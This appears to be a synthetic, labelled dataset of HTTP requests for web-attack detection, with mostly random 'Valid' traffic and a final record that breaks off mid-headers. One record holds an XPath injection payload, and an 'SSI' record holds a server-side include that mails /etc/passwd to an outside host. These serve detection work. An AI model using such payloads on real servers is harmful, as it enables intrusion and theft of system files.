UA-Pixels: 872x878
Via: FTP/4.3 173.1.82.222, FTP/1.4 www.dgazy3.js, 8.3 www.tl1ese.htm
Transfer-Encoding: 8dxl; 5dnNetcr=aiefuy
Upgrade: ahpr/8.4, iraUdd/9.2, cnc6/0.3
Warning: 033 www.ht6forRg.shtml "vwcfh1evolhtnobct" 
X-Forwarded-For: 182.55.25.220
X-Serial-Number: 5833814723
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

dohUse0Rjcho=wstl&hnsxsd9roqdmk=ivrcieww6pte&stdinJSDdocument8=c6e6d8hOTn&XriYr=fycnH&Ra=rtlhtaaA b&reae=5

End - Id: 4158
Start - Id: 1825
class: Valid
GET /rXivtW.goSBZU5ml4lc/ehi7fm/c0dvEPMnP.js?xayeDotetpi=yev5hrME HTTP/1.0
Host: 17.249.226.253:80
Connection: 0qs5
Accept: */*
Accept-Charset: *
Accept-Encoding: *
Accept-Language: mn-hi7
Cache-Control: no-store
Client-ip: 97.64.37.35
Cookie: detJNoonhz=515225;dnhcsMlh=boMi0is;nq=te;fhuwaNtr=13
Cookie2: $Version="47"
Date: Tue, 02 Aug 05 16:54:49 CET
ETag: "j@CxBIw8ue7tt-v"
Expect: asReiisa=mLvton2a
From: etiimsr@2ilc8.de
If-Modified-Since: Thu, 12 May 05 02:39:45 UTC
If-Unmodified-Since: Fri, 01 Dec 06 11:38:22 CET
If-Match: *
If-None-Match: *
If-Range: "8DTy-_5229-W8pexUo"
Max-Forwards: 295
MIME-Version: 3.1
Pragma: no-cache
Proxy-Authorization: NTLM Yzd0MGhYc25oaDhudDgwcmVhdGVublZld3VkYWFjbGlvZnQ=
Authorization: Basic ZVBFb3JhOm5lbk9ERA==
Range: -1402,47341-
Referer: /e3kBfweb.jpeg
TE: deflate,gzip;q=0.7,trailers
Trailer: Warning
User-Agent: ettjnoFsgilmdyop
UA-CPU: x86
UA-Disp: 0564,279,8
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 289x684
Via: 5.7 www.8iedu.png, 4.8 73.114.180.229:5942
Transfer-Encoding: compress
Upgrade: mntn/9.1, 8tme/6.2, rRoA/2.8, jle/4.8
Warning: 613 www.Hxowi.gif "ooxsXtuvN0ccdOg4eio" "Mon, 26 Apr 04 22:54:11 UTC"
X-Forwarded-For: 71.120.203.217
X-Serial-Number: 0392549
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 1825
Start - Id: 2160
class: Valid
GET /mEuk0/kPT8y.EOs8.g/r@5x.htm?tedaszooe=%3Bbodyzjl%26z9mehrxb&ret68t=TaH&0TolisrjnojAO=scsavnstyledSlt&nodeB5group byhLEEWByY=re+oana%242&iesilasolnj=lrLZ7fN67M&2odoNruaecdun=gdc2Ye-8&evcwyiba2ticw=1375090&aahep=shl&en=t&9knErsas2l=94575&qnfcyhhx=%3Btayslikewilmnyh%29netcatr&pjxvLcbEN=60833&8O4passwdFimgKddropheF=E+div HTTP/1.0
Host: www.wnDlr.st
Connection: close
Accept: text/plain
Accept-Charset: *
Accept-Encoding: compress, compress;q=0.7, gzip;q=0.9
Accept-Language: le-gho4rHa;q=0.6, r0eorf7-COe, e-i3ose1x, vioton-hstcd;q=0.6
Cache-Control: no-transform
Client-ip: 82.66.17.224
Cookie: o0Eecroe1mhhltl=26640;nFyweDyAWQ8G=22;R2NWrI=7;fUFBVD5Ppc=6712;eaeqde=ea-W
Cookie2: $Version="400"
Date: Fri, 18 Nov 05 02:11:40 GMT
ETag: W/"4eoX3FjnHzJ3RDSMPkMS"
Expect: 100-continue
From: cwaupt@0tmyctatse.net
If-Modified-Since: Mon, 24 Mar 08 05:35:03 GMT
If-Unmodified-Since: Sun, 01 Mar 09 11:54:12 CET
If-Match: *
If-None-Match: *
If-Range: Mon, 05 Jun 06 20:36:33 GMT
Max-Forwards: 7
MIME-Version: 3.0
Pragma: no-cache
Proxy-Authorization: Digest nonce
Authorization: Digest nonce
Range: -5,61-,-809
Referer: /tbkeRde.tar.gz
TE: gzip
Trailer: Connection
User-Agent: Mozilla/4.0 (Windows; U; Win98 9.5; hn-er; rv:8.4.0) Gecko/26006159
UA-CPU: MIPS
UA-Disp: 5906,5130,8
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 270x992
Via: HTTP/6.8 www.htoSls.gif
Transfer-Encoding: identity
Upgrade: zienis/1.2, iyetd7/7.3, isE8gA/1.8, ehh9m4/7.8, eeb/5.1
Warning: 722 4.238.114.92 "eaedoiYafssfmr6w" 
X-Forwarded-For: 130.173.148.175
X-Serial-Number: 9895241717803854226
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 2160
Start - Id: 5950
class: Valid
PUT /iCXMgX3VHUi9002jq/0XS8_iRv9BhCnv4r/amyAPLYRSucsTU-NFv3/snoxaqnhtltyqulrlti/5Lnullf@criJ3SOSopasswd/Eue8eteose.css? HTTP/1.1
Content-Length: 215
Content-Language: dg,792,ucenlh4
Content-Encoding: gzip
Content-Location: http://www.hastgls.be/rN7r.mdb
Content-MD5: aWliVGV0dHJ3YWxjcnJzYQ==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 25 Sep 05 11:53:16 UTC
Last-Modified: Wed, 03 Mar 10 09:02:31 CET
Host: 175.36.66.135
Connection: close
Accept: */*;q=0.2
Accept-Charset: iso-2022-jp;q=0.5, cp-932;q=0.4, x-mac-korean;q=0.9, x-mac-arabic, utf-7
Accept-Encoding: 
Accept-Language: ssi-hs4N, d-aem;q=0.3, e-nsaar;q=0.3, ea4ltt6-7tLySde, mhe-Tsloy9;q=0.3
Cache-Control: no-cache
Client-ip: 255.92.138.163
Cookie: ljand=17891;ssiieAtdd=e;xhEuqaIeitacy=h tve7co;iit=gcV;eATt=iEO-JGVHJI;i8mPlif7G=g-pem
Cookie2: $Version="344"
Date: Sun, 10 Jul 05 19:44:14 CET
ETag: W/"ZofDx5HpO_bdoX7MkU"
Expect: 100-continue
From: t0hv@Afuotwnusz.uk
If-Modified-Since: Sat, 06 Oct 07 13:59:20 GMT
If-Unmodified-Since: Tue, 16 Nov 04 13:57:34 UTC
If-Match: "cp3YOEs8BG7Jh0hXx"
If-None-Match: "R8-e-H5DwNV3o.jLt174"
If-Range: Wed, 03 Mar 04 06:18:26 CET
Max-Forwards: 8
MIME-Version: 4.3
Pragma: no-cache
Proxy-Authorization: Digest realm
Authorization: Basic ZG8yYnQ6dUxoc29y
Range: 07726-6761,710997-63,-6296
Referer: /rrs0rs.mpg
TE: trailers,gzip;q=0.0,trailers
Trailer: Connection
User-Agent: Mozilla/2.5 (Machintosh; U; PPC Mac OS X 1.7; rs-en; rv:7.5.5) Gecko/56042480
UA-CPU: x86
UA-Disp: 407,032,16
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 457x9352
Via: 9.1 55.12.207.27, zal/0.4 www.eec3oas.gif, 4.4 244.0.13.213:819
Transfer-Encoding: compress
Upgrade: cdoiP/9.4, nnv8de/5.7, 4pwb4/1.4
Warning: 725 www.sdsWm.shtml "dsLrjmutignetroi5n" "Wed, 04 Jun 08 20:36:56 UTC"
X-Forwarded-For: 116.91.78.157
X-Serial-Number: 235537183752
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

wedym=734&CconnectscriptD=5$2&Edti=88&tyACxpioevmhb=15305&re7t=12&iatletst=8380945644&aVaetowe58IieFE=4is@location&8rsx8asoR=netcata&bo>uorz64ortg &aljtnvcuEwbi=amo&nrtndTisrtivHat=8332033442&kB7zMn_r=Dhwdaz

End - Id: 5950
Start - Id: 7422
class: Valid
POST /8Z-cGkq6_nz23/gvfROE9/afxmbNL/i0eor79NI/aligpemttrtmmswtdldn/hnMnwd0haeYc/uiOLfatVklLoIelF/hsccn5Q2aimtabtu/ni3u.gif? HTTP/1.1
Content-Length: 199
Content-Language: jw,rEe7,hkouc
Content-Encoding: compress
Content-Location: /iro5az.swf
Content-MD5: ZWwzb09ob2FFbmZzZWFTbA==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 16 Jan 09 04:14:55 GMT
Last-Modified: Sat, 18 Apr 09 02:29:55 GMT
Host: 244.33.212.129
Connection: close
Accept: */*;q=0.2
Accept-Charset: *
Accept-Encoding: gzip, identity, compress, identity;q=0.0
Accept-Language: 4agyt9na-v2indeen;q=0.7, ogf-vdr;q=0.8
Cache-Control: no-store
Client-ip: 243.11.113.234
Cookie: goFKQyTzHR=iIs8;otihi=s-MU4l1;asf0qsciehc9=lys5e3e;cS1IDs=ynymWpot
Cookie2: $Version="5"
Date: Sat, 13 Nov 04 09:56:13 CET
ETag: "JpO5KtlzF_TVk9zONL"
Expect: sfbao7
From: etjre@ngegAdwy.net
If-Modified-Since: Sat, 28 May 05 04:06:23 UTC
If-Unmodified-Since: Sun, 18 Jan 09 08:41:53 CET
If-Match: "-u6YzIOOWogQoM4"
If-None-Match: *
If-Range: Sun, 20 Sep 09 23:26:17 UTC
Max-Forwards: 63
MIME-Version: 3.8
Pragma: OusrT=oset
Proxy-Authorization: asue bpcdhTC=a83idrez
Authorization: Digest nc=965bc9eD
Range: 1-587,1-,-06
Referer: /4eoaalrm/di9cvtxo/efo7s5.bin
TE: trailers,trailers,trailers
Trailer: If-Range
User-Agent: Mozilla/1.9 (compatible; nur8prgue; Linux i586; tatsysOSn)
UA-CPU: x86
UA-Disp: 0192,953,8
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 9649x7067
Via: 1.7 3.203.29.142
Transfer-Encoding: gzip
Upgrade: selgl/5.1, ho6t/0.1
Warning: 235 www.eancis.jpeg:3197 "utlefmea" 
X-Forwarded-For: 248.139.237.35
X-Serial-Number: 51648085743746
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

n4oIOhzitr= r\&nNtEhdpHnt=761844&5iwlso4Sli=nm1oThor&eyeE3ooA29bme=95815&mJttuoni=gehlhsEhntmN5&tG=iz>iueincludea&RexecTi&nee=39&w0Brveeghd=a+ela e&hii7e=n%o\s&rn1Oluaabmao=s88&o7ht=epmwb

End - Id: 7422
Start - Id: 425
class: Valid
GET /rcPKD_MuMBepg.png?eMeziEors=IlinkA&O7ohttpbodyZ=n3e%29ilo HTTP/1.0
Host: www.OUeQXoszw.ch
Connection: tvttn
Accept: application/postscript;q=0.8, application/*
Accept-Charset: iso-8859-1;q=0.8, x-mac-korean;q=0.8
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-cache
Client-ip: 179.99.29.169
Cookie: 13iYv6ELR=h
Cookie2: $Version="95"
Date: Sun, 09 Sep 07 21:52:12 UTC
ETag: W/"YUa-s-MFkJ-kkNbWf"
Expect: w5de
From: enIsusc@saoftwhhea.net
If-Modified-Since: Thu, 14 Sep 06 18:38:39 UTC
If-Unmodified-Since: Sat, 06 May 06 23:03:56 UTC
If-Match: *
If-None-Match: *
If-Range: Tue, 02 Jun 09 05:38:44 CET
Max-Forwards: 628
MIME-Version: 5.0
Pragma: no-cache
Proxy-Authorization: Eiop oaUat=rr1iwqp
Authorization: nrsn hoj5u1=tqfdc
Range: 95586-,-851,-5894
Referer: http://www.ninon.be/cesoutoi/Spqhgun/dogcoar/mglpjah/djOT.cfm
TE: gzip,trailers,deflate;q=0.6
Trailer: Trailer
User-Agent: rhDaGqgxO http://www.potc.cz
UA-CPU: Sparc
UA-Disp: 1281,5402,8
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 7545x2141
Via: 9.2 186.71.241.156, l6aKte/6.9 www.hnhie.jpeg:03060, 7.6 22.99.44.128:230
Transfer-Encoding: gzip
Upgrade: h8v/5.8, rdh/0.4, hph/9.9, 1sOa/3.6, nneh/1.1
Warning: 656 www.Eueob.jpeg "ftw6imej7arsamh8" "Sat, 30 Aug 08 10:43:37 UTC"
X-Forwarded-For: 117.218.252.232
X-Serial-Number: 12415711781271440816
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 425
Start - Id: 30184
class: Valid
GET /KqI66uH.css? HTTP/1.0
Host: www.nlssA3.ch
Connection: keep-alive
Accept: image/*, audio/*
Accept-Charset: ks_c_5601-1987, euc-cn, iso-2022-jp;q=0.9, iso-2022-kr, cp-950
Accept-Encoding: *
Accept-Language: *;q=0.1
Cache-Control: max-stale
Client-ip: 142.65.134.222
Cookie: MEtDx6Ao=wxQUSamNo7a;VLtS_14b2V=sdc3slo2bArtwe7gg;EN0JDOtW=imnullr
Cookie2: $Version="502"
Date: Fri, 17 Nov 06 20:26:44 CET
ETag: W/"MCrQ0qPgTN4bDuHMj"
Expect: 100-continue
From: wieAim@aawfi.fr
If-Modified-Since: Sun, 22 Feb 09 21:40:58 UTC
If-Unmodified-Since: Wed, 02 Sep 09 15:50:56 CET
If-Match: "dsFG4RU2RAS0WX9l"
If-None-Match: *
If-Range: Sat, 28 Jun 08 15:12:40 UTC
Max-Forwards: 146
MIME-Version: 5.5
Pragma: s0rb='sa1iwEsl'
Proxy-Authorization: aGeo uhioari5=RFiho
Authorization: eoLie oA8DtE=cia3d
Range: 922332-59
Referer: http://www.p0giaec.biz/yhsl.fgf
TE: trailers,chunked;q=0.8
Trailer: Connection
User-Agent: Mozilla/0.6 (compatible; pietrtxcs; WinNT; behgigam; mronNsi; krobBt)
UA-CPU: x86
UA-Disp: 133,828,16
UA-OS: Win95
UA-Color: color16
UA-Pixels: 488x0113
Via: 5.2 www.rzyIH.shtml, 1soteu/2.5 www.ycstn.jpeg, FTP/6.6 87.158.97.203
Transfer-Encoding: f7hv7e; rdkEMt=aomr3qss
Upgrade: hosi/6.7, fne0e/8.7, zeue/7.8
Warning: 337 145.226.205.116 "slrtoretepnre" 
X-Forwarded-For: 46.52.217.2
X-Serial-Number: 96974116
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 30184
Start - Id: 15003
class: Valid
GET /oCQgJZRLKEM/wps@V3ZViframeexecR3b/0-T5m@m1eo/3iplsrossctettBG6atl/wt/i79dayGzF./@tf.tiff?nel2eogeswnda=emftmocha%7EsQiEip+tn&hwn4jeibaiecimt=atoanp7bhweNtfuiod&H_EfVXnull_Beval=eallru%3EonwT%7Ca&6nmh=7222029&Rtto=u0R7&amEcVAfwherefromQU=696772&aH1jBQpBtxml77=2ea+&o1e3rmc2uee=hlaaYgdaU&oocsocouhcu3bde=f9%5CEtqE84between%3Cnotdn&twwp-6JtM=yDjbsf&ostn4s=iOsteijcerhnacsel&teblrsOTqibnrwa=90458930&hlno5=o&7n8tagx=369497663 HTTP/1.0
Host: 227.114.87.255
Connection: t6eodnu
Accept: */*;q=0.8
Accept-Charset: *;q=0.3
Accept-Encoding: identity, compress;q=0.3, gzip, compress;q=0.9, compress
Accept-Language: *
Cache-Control: max-stale
Client-ip: 167.67.44.2
Cookie: aqr=/n >e]et|oe'bgsound|Te;a4hodx5ta=653;rtredpN8=90019;oanoMtt=8981
Cookie2: $Version="375"
Date: Thu, 22 Mar 07 22:49:55 CET
ETag: W/"MfeeJHP-RoS@qIk9a"
Expect: wsWt
From: ol9n@oiatmee.uk
If-Modified-Since: Sun, 20 May 07 17:10:04 GMT
If-Unmodified-Since: Fri, 18 Jan 08 05:25:38 UTC
If-Match: "mdtP27nh8fmQ3r-H"
If-None-Match: *
If-Range: Tue, 11 Oct 05 01:56:50 CET
Max-Forwards: 09
MIME-Version: 2.9
Pragma: no-cache
Proxy-Authorization: NTLM YWVvZXNFYTVub1J1aXRTcHNscmUwZW5lcmVjaWJsY2Rvc2J1
Authorization: Digest opaque="otwtnt"
Range: 437989-,49-308,-959613
Referer: /soIssjn/zsArnsn/hiepqisS/noeeNI/Vcrit.tar
TE: gzip;q=0.1
Trailer: If-Unmodified-Since
User-Agent: Mozilla/3.7 (compatible; fa1yrHoehn; Solaris; euve6)
UA-CPU: StrongARM
UA-Disp: 0183,0676,8
UA-OS: Win95
UA-Color: color16
UA-Pixels: 7618x6392
Via: FTP/9.0 142.235.124.178
Transfer-Encoding: isdri; te6n=qdwmt
Upgrade: qorD5j/0.6
Warning: 641 202.8.88.27 "aaoro5heeuwe7n" "Sun, 15 Aug 04 01:12:51 UTC"
X-Forwarded-For: 86.218.51.227
X-Serial-Number: 158686381572781
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 15003
Start - Id: 31369
class: Valid
GET /ad/au97/nKJtjwindow.openTCGpIE/Zyc89Tyw/itexnode0mDade/shm05mDwxEa8kg/ciCac.tiff?eiaax=4&priKEltnsete=2&RF1qSXMVjOT=nie&Y4N3IyKIq=sezfs6updater&aaguoyqfsi8j=8483621&Ax=tis&l3tlb=0&t9eamttta=hsn HTTP/1.1
Host: 63.210.2.146:80
Connection: lyHae5
Accept: text/*;q=0.4, video/*;q=0.4
Accept-Charset: cp-936;q=0.5, x-mac-greek;q=0.1
Accept-Encoding: identity, gzip
Accept-Language: *
Cache-Control: no-store
Client-ip: 164.204.220.43
Cookie: emelssd=sA6J1C4uas;TfK7C-decho=\cbinnt;AfincludeprTg=ut
Cookie2: $Version="334"
Date: Sat, 14 Apr 07 15:56:05 CET
ETag: W/"A0J0pwaWSm06g8As0Q6@"
Expect: 100-continue
From: eoeo@6smfoRe.org
If-Modified-Since: Fri, 04 Apr 08 23:02:07 CET
If-Unmodified-Since: Sun, 10 Jul 05 12:53:42 GMT
If-Match: *
If-None-Match: *
If-Range: Sat, 18 Jul 09 12:31:12 UTC
Max-Forwards: 4652
MIME-Version: 8.7
Pragma: h='eaewnh'
Proxy-Authorization: NTLM dGVyZHluZW5zcHNkbmFwYWVST2VlamlucGlMaXV0Ym50YU9vY2k=
Authorization: Digest uri=/enehbt/ertldT/rr5T/iieiq/ursmlo.jsp
Range: -34878,6878-7,3101-
Referer: http://www.lptcgt.org/rae6e.pl
TE: trailers,deflate,deflate;q=0.7
Trailer: Referer
User-Agent: Mozilla/1.2 (compatible; MSIE 3.6; Solaris; td6o3mn8e; 9tar; 7e8xisb)
UA-CPU: x86
UA-Disp: 2596,238,32
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 7934x883
Via: 9.3 218.173.55.127, 2.0 www.vhlweo.jpg, sola/6.9 255.250.185.247:73
Transfer-Encoding: compress
Upgrade: aaeza/3.0
Warning: 013 www.desun.jpg "AikotD" "Sun, 12 Nov 06 05:18:44 UTC"
X-Forwarded-For: 122.12.60.197
X-Serial-Number: 12566826495921
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 31369
Start - Id: 35748
class: XPathInjection
GET /gaPdpj5.asp?bezirha=la%27++++or+++count%28++path%2Fchild%3A%3Anode%28%29%5Bposition%28+++%29%3D%28%28++i+++%2Bj+%2B+++k+%2B++++l+++%2B+1%29%5D++++%7C++++path%2Fchild%3A%3A*%28%29%5Bposition%28%29%3D%28k%2B1%29%5D%29%3D1+++++or+%27dua%27++%3D+++%27+++++ernm%27+++++or&gtt1dehhcdb=r+yxeeasHe+0&lar=cneeuuiEnrdc2s&ecr=eE%5DgOlo%3C&ttezodjar=N+%40%26nv%5Drega%27%24o HTTP/1.1
Host: 238.185.161.65
Connection: keep-alive
Accept: video/*, image/jpeg, application/zip;q=0.2
Accept-Charset: *
Accept-Encoding: identity;q=0.8, identity;q=0.1, compress
Accept-Language: 6c4nh-0;q=0.1
Cache-Control: max-age=00
Client-ip: 149.222.22.125
Cookie: saedRr2a=076757287;n7tatbycIetninr=9135610851;YOi79YWfkxnull=mpnnaobomochaetgroup bye31
Cookie2: $Version="5"
Date: Tue, 28 Dec 04 07:21:35 UTC
ETag: "Y2G28OgdZeEhliz"
Expect: 100-continue
From: T5icshho@0Oledom8.gov
If-Modified-Since: Sat, 26 Nov 05 05:31:57 GMT
If-Unmodified-Since: Tue, 06 Jul 04 17:21:50 CET
If-Match: "gAzTgAbOGl8BwEygsuuQ"
If-None-Match: *
If-Range: Thu, 15 Apr 10 10:13:58 UTC
Max-Forwards: 311
MIME-Version: 5.0
Pragma: eild=oOcba
Proxy-Authorization: adwi etihc=5lIn4t
Authorization: NTLM ZWFyOWRhbXVsb2V1ZDBsckhmOHJocm5JcnJpc2F0ZVI0YlRu
Range: -042616,-147342
Referer: /nfapTto/uixnoi/bfnm/reqpedhd.php4
TE: trailers,trailers,trailers
Trailer: Connection
User-Agent: ul0dosrsomnfwsxg1rkT
UA-CPU: x86
UA-Disp: 233,859,8
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 161x6887
Via: 3.1 219.78.110.72, 6.7 www.an9t.png
Transfer-Encoding: cdai
Upgrade: Toa/4.1
Warning: 830 150.180.170.121 "g2fnareaRtt4gNB1gprl" 
X-Forwarded-For: 171.203.103.227
X-Serial-Number: 8308712683150744327
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35748
Start - Id: 2470
class: Valid
GET /iaiititznsngkhrj/uFRZzNVI0Xszvc8/fdrgiwgcwrrr64hhuzke.bin?Tdo2eolyees=r0rfIth HTTP/1.0
Host: 47.3.239.180:2983
Connection: close
Accept: */*
Accept-Charset: *;q=0.1
Accept-Encoding: deflate;q=0.8, identity;q=0.7, identity
Accept-Language: whnp-uy5nr0e;q=0.3, tg2atkc-ciuwI, ud4n-Hd, Taaoeo-gaS
Cache-Control: only-if-cached
Client-ip: 14.197.207.157
Cookie: olahnwh=La;taqtra=nl yhlobjectGtCsystemtupdate d
Cookie2: $Version="1"
Date: Wed, 08 Feb 06 10:56:51 CET
ETag: W/"CuRD6g@yvVRM9TXyO"
Expect: dEtda
From: 0s8tX@arsT.cz
If-Modified-Since: Tue, 27 Apr 04 06:47:48 CET
If-Unmodified-Since: Fri, 02 Dec 05 06:28:35 CET
If-Match: *
If-None-Match: *
If-Range: "WzVXYvcXp_5MUSt"
Max-Forwards: 622
MIME-Version: 6.6
Pragma: s3=lrsceyN
Proxy-Authorization: Basic dDZnYXU6eWVyb3NO
Authorization: Basic QXRlb3M4aG46c09Bd3JJ
Range: 87817-,2898-
Referer: /phMEx/Cksdsysn/eiEi/tsldcdi.pl
TE: gzip;q=0.3,trailers
Trailer: Transfer-Encoding
User-Agent: Mozilla/6.7 (X11; U; Linux i586 1.9; Te-wh; rv:2.3.0) Gecko/37890750
UA-CPU: x86
UA-Disp: 105,9548,16
UA-OS: Win98
UA-Color: color16
UA-Pixels: 392x1193
Via: 7.8 119.145.224.200:87611, FTP/1.5 158.217.237.245
Transfer-Encoding: compress
Upgrade: Hslrot/3.2, nPdtaa/1.1
Warning: 552 www.tsng.jpg:1 "tsmt879qcdlEstelgpx" "Wed, 23 Nov 05 20:06:09 UTC"
X-Forwarded-For: 213.191.153.150
X-Serial-Number: 347745233258688600
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 2470
Start - Id: 33332
class: Valid
POST /G14QKt@m/nadngym7hetil/fD5YNwBbinPd/itaalghirdeh/8akl6dTmJhy/suBNhhttps4-meI/lT9j_wyPJfQKYd.wiI/s8dhglzlotkebflAzeD/k6wfJW3Y5U8S/swehgst.css? HTTP/1.0
Content-Length: 126
Content-Language: ilemdq,Y0sa,aE8fTh
Content-Encoding: compress
Content-Location: /itee4/sWiqonLr/ahhtSmey.swf
Content-MD5: R2VneWVmdHNrandndTRudA==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 14 Aug 06 08:42:56 UTC
Last-Modified: Thu, 02 Jul 09 05:24:45 GMT
Host: www.tbtaatehn6.net:55
Connection: leleai
Accept: */*;q=0.5
Accept-Charset: iso-8859-4;q=0.6, iso-8859-1;q=0.6
Accept-Encoding: 
Accept-Language: olgtq-e0etvhd, lf29-clnoe9bJ;q=0.6, sl5hifea-mct;q=0.8, woohdo2-eShdc;q=0.9, tis-nses;q=0.4
Cache-Control: min-fresh=18061
Client-ip: 148.77.109.208
Cookie: nenw=27;ee0=9HLf1358oK;rfo1otnma=6Ccxx3G-Tk;un8mnseoOAew=lo1
Cookie2: $Version="59"
Date: Mon, 28 Sep 09 04:09:27 UTC
ETag: W/"aYE2lX5JEkSIDDOqg1n"
Expect: hTuga
From: rcidi8@tsUeIwinez.net
If-Modified-Since: Thu, 10 Feb 05 08:21:02 UTC
If-Unmodified-Since: Thu, 13 Nov 08 05:02:45 UTC
If-Match: *
If-None-Match: "ZLw4Ouiy4sv2BGKq"
If-Range: Thu, 26 Feb 04 06:49:01 GMT
Max-Forwards: 8484
MIME-Version: 8.6
Pragma: zlne='rr7ifsa'
Proxy-Authorization: Basic YWpucmtDbzpvZXRlcA==
Authorization: Basic OUVhYWQ6aWFoSGloVGM=
Range: 02-,-079218,7-
Referer: http://tatiaysr.com/adiha/inojo7U/nxiRe2rh/waEowN/oNftta.wmn
TE: gzip,chunked,chunked
Trailer: User-Agent
User-Agent: Mozilla/3.5 (compatible; usnupcebss; Open BSD i386; gfshje; ThAt; oiwcirT1tr)
UA-CPU: StrongARM
UA-Disp: 6610,281,16
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 2101x785
Via: 2Pd/5.1 www.a32erlo.jpg
Transfer-Encoding: deflate
Upgrade: 6stde/0.3, ewtMfk/8.5, rt9eT5/1.5, nSTo/9.3
Warning: 231 205.9.41.94:7104 "5bslathe9ce" "Sat, 19 May 07 07:06:34 CET"
X-Forwarded-For: 178.187.50.135
X-Serial-Number: 507745328384064
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~

jirre3b5atp=e/ebk|cr0o&1oTelaifagts=tDerw@&nfrFu4sto8otu4=nVUvFG&XbetweenP_hGVJposition=cwuDrcrN9a&hIhorizrOat=0==tC

End - Id: 33332
Start - Id: 17284
class: Valid
GET /3dwRBI/gci/K-M/formJADyxOhttpszY_eio1/bQRMmaMCPuR/5LqyLe9Qs6H/as16t.css?ms=ata&nclecntlaiBnt=740&ta=734&htraO=39&t0vQKX0=scrtOoaEf&Rx0D=3u&reo8rlaaesi4s=danlg37&goe=915892967&oxTsMrl=oewinntee HTTP/1.0
Host: www.Rmnrvd.uk
Connection: ltoiH
Accept: */*
Accept-Charset: *;q=0.8
Accept-Encoding: 
Accept-Language: Cru-we2;q=0.0, ed0hcwe-aussfbah;q=0.1, u-atv;q=0.0, ltj1n-t8eutun
Cache-Control: no-transform
Client-ip: 167.131.62.52
Cookie: window.openHq7sM.zUWd=27;bi=iysoTYh;ssetivr4sOdfiH=407924
Cookie2: $Version="242"
Date: Thu, 01 Sep 05 17:46:17 GMT
ETag: W/"k8@wlhOkyP1w_dGraS"
Expect: 100-continue
From: ahipt@bhraulhaa.fr
If-Modified-Since: Mon, 08 Aug 05 15:38:16 GMT
If-Unmodified-Since: Tue, 24 Feb 09 04:59:32 GMT
If-Match: "_dy009E8FMdPvJ6z5c_"
If-None-Match: "2xq3Pu9XQT2JQjFBvuAX"
If-Range: Thu, 18 Dec 08 13:14:28 UTC
Max-Forwards: 0
MIME-Version: 0.0
Pragma: is='ueyo5i'
Proxy-Authorization: Basic dnRuamVzdGE6dGF0dGhlZQ==
Authorization: NTLM OWV1ZTB0bG9lZW9pZWVlaTdtb3RucnNlOWNuckN3c3Jz
Range: 09626-1394,221800-
Referer: /nine.tar.gz
TE: trailers
Trailer: Pragma
User-Agent: Mozilla/4.9 (compatible; MSIE 7.6; Win98; n5debr)
UA-CPU: StrongARM
UA-Disp: 7151,7445,8
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 552x034
Via: 1.0 173.192.204.138, 3.2 www.0iC2.gif
Transfer-Encoding: aein; y04ezeye=tpLj
Upgrade: 6qfh/4.6, zsr/5.7, ahWg3/9.0, 3evA/9.8
Warning: 819 33.81.58.189:59 "sxjEOamwna" 
X-Forwarded-For: 153.184.197.192
X-Serial-Number: 835471798337
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 17284
Start - Id: 39982
class: SSI
GET /e-QJHS/2QbmonuFzt7mzoe1oi/6Yp.gHI3XE-rn7aAWd/eQl/sezyccoeknat/ts987q2k/xoW/f0cteSmn/CO/5IE@JLFwxT/u3bvfk9r357@nzS.swf?nylm=2oa&dwr=sRytPt%3Ft&td=Ot6twesysteminn&oemroio=input%26optn&2h4en9v=p+r&0n4di=shhcljntsmS&dnt3bin=cph1Pzrefcltp&ztw6tsq=%3C%21--++%23exec+++++cmd%3D%22%2Fbin%2Fmail+0tglt5og.com+++++%3C+++++%2Fetc%2Fpasswd%22--%3E&njs=%5Bpasswddbse+NoscrcteMass&erxLlle=3&bstsyu10Uueeu=3&ncpXmw9rar=p5R HTTP/1.1
Host: www.aneTft3awa.gov
Connection: b1tn
Accept: */*
Accept-Charset: iso-8859-9, windows-1253;q=0.8
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-cache
Client-ip: 53.134.2.1
Cookie: oo=ltc&+5sdjspcucdstdin0nsI
Cookie2: $Version="941"
Date: Sat, 28 Jan 06 24:02:40 GMT
ETag: "syLbFXo8hSf7y.nXN"
Expect: 100-continue
From: 5iWxsCt@nr6efecsn.de
If-Modified-Since: Sat, 30 Apr 05 20:33:05 GMT
If-Unmodified-Since: Mon, 09 Jul 07 03:36:18 UTC
If-Match: "u1YdDrP@zSHRr3Q"
If-None-Match: "IKdmC7jKu_85OKGJs"
If-Range: "t7jWhpECJQT6K7-Pr"
Max-Forwards: 08
MIME-Version: 3.3
